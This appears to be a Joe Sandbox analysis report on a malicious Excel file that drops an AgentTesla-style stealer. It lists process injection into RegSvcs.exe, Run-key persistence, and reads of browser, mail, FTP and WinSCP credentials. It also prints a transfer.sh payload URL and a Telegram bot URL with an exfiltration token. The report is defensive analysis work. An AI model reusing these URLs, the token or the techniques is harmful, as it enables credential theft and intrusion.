Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Thread delayed: delay time: 31989	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.1171448504.0000000002537000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lu<font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(04/08/2022 12:52:29)</font></font><br>L)X
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerxe
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Time: 04/08/2022 12:58:29<br>User Name: user<br>Computer Name: 082561<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: <br><hr><br><font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(04/08/2022 12:52:29)</font></font><br><font color="#00ba66">{Win}</font>r

Source: C:\Users\user\AppData\Local\Temp\dropped.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\dropped.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dropped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Source: Yara match	File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	311 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	312 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	52 Scripting	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Deobfuscate/Decode Files or Information	11 Input Capture	114 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	23 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	52 Scripting	1 Credentials in Registry	311 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	11 Encrypted Channel	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	11 Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	13 Software Packing	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	312 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
00001.LPCD2022.xls	61%	Virustotal		Browse
00001.LPCD2022.xls	60%	ReversingLabs	Script-Macro.Trojan.Valyria
00001.LPCD2022.xls	100%	Avira	W97M/Agent.1196916
00001.LPCD2022.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\dropped.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\dropped.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\BINGO\BINGO.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.2.RegSvcs.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1203035	Download File
3.0.RegSvcs.exe.400000.4.unpack	100%	Avira	TR/Spy.Gen8	Download File
3.0.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8	Download File
3.0.RegSvcs.exe.400000.3.unpack	100%	Avira	TR/Spy.Gen8	Download File
3.0.RegSvcs.exe.400000.2.unpack	100%	Avira	TR/Spy.Gen8	Download File
3.0.RegSvcs.exe.400000.1.unpack	100%	Avira	TR/Spy.Gen8	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://crl.m	0%	URL Reputation	safe
http://GCHNJv.com	0%	Avira URL Cloud	safe
https://api.ipify.org%appdata	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
https://api.telegram.orgP	0%	Avira URL Cloud	safe
https://api.telegram	0%	URL Reputation	safe
http://Kcwgjt6COc07kGTRi1sQ.net	0%	Avira URL Cloud	safe
https://api.ipify.org%	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
transfer.sh	144.76.136.153	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument	false		high
https://transfer.sh/Uv5XFY/0000.LPCD2022.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://crl.m	RegSvcs.exe, 00000003.00000002.1171298576.00000000007E6000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://GCHNJv.com	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org	RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/	dropped.exe, 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ipify.org%appdata	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.orgP	RegSvcs.exe, 00000003.00000002.1171520335.000000000259A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram	RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://Kcwgjt6COc07kGTRi1sQ.net	RegSvcs.exe, 00000003.00000002.1171424229.000000000251B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	RegSvcs.exe, 00000003.00000002.1171566273.00000000025E3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org%	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://api.telegram.org/bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocumentdocument-----	RegSvcs.exe, 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.136.153	transfer.sh	Germany		24940	HETZNER-ASDE	false
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	605526
Start date and time:	2022-04-08 10:12:02 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	00001.LPCD2022.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winXLS@6/4@26/2
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 2.4% (good quality ratio 1.8%) Quality average: 61.4% Quality standard deviation: 39.5%
HCA Information:	Successful, ratio: 97% Number of executed functions: 173 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .xls Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, conhost.exe
Execution Graph export aborted for target BINGO.exe, PID 2992 because it is empty
Execution Graph export aborted for target BINGO.exe, PID 948 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:13:20	API Interceptor	48x Sleep call for process: dropped.exe modified
12:13:26	API Interceptor	774x Sleep call for process: RegSvcs.exe modified
12:13:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BINGO C:\Users\user\AppData\Roaming\BINGO\BINGO.exe
12:13:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BINGO C:\Users\user\AppData\Roaming\BINGO\BINGO.exe
12:13:38	API Interceptor	5x Sleep call for process: BINGO.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
144.76.136.153	ksuO9C24QH.exe	Get hash	malicious	Browse	transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
	ksuO9C24QH.exe	Get hash	malicious	Browse	transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
	file.exe	Get hash	malicious	Browse	transfer.sh/get/EBgWOR/Jhkgft_Cptucfoi.bmp
	86503807.exe	Get hash	malicious	Browse	transfer.sh/get/Fh5qw1/Yviliqfen.log
	24982297.exe	Get hash	malicious	Browse	transfer.sh/get/7l55ti/Yqheqrnit.png
	67259493.exe	Get hash	malicious	Browse	transfer.sh/get/sP0JXy/12.png
	89085041.exe	Get hash	malicious	Browse	transfer.sh/get/TaUSBQ/Tzdtprkp.log
	11286208.exe	Get hash	malicious	Browse	transfer.sh/get/1KEmBC/Odhxu.jpg
